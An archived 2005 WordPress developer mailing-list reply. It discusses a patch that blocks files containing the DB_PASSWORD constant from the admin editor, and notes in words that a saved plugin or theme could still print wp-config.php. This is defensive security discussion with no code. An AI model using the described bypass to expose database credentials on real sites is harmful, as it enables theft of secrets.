[wp-hackers] Security Vulnerability found - Forum Post

Kimmo Suominen kim at tac.nyc.ny.us
Thu Apr 14 06:13:12 GMT 2005

On Thu, Apr 14, 2005 at 12:27:12AM -0400, Owen Winkler wrote:
> Nonetheless, the enclosed patch prevents any user from reading or 
> writing a file that contains the DB_PASSWORD constant, including the 
> wp-admin/templates.php file.  With this not only can't you read files 
> that contain your WordPress database password via the web interface, you 
> can't alter existing files to output the password.  Of course, this will 
> prevent you from editing wp-config.php, setup-config.php, 
> wp-config-sample.php, and wp-db.php, but if you have cause to mess with 
> those files in the first place, you probably know how to use FTP or SSH 
> which would probably be better suited.

Since one could still save a file (e.g. a plugin or theme component)
that outputs the contents of wp-config.php on a web page, is checking
for DB_PASSWORD really that useful?

+ Kim
<A HREF="http://kimmo.suominen.com/">Kimmo Suominen</A>

More information about the wp-hackers mailing list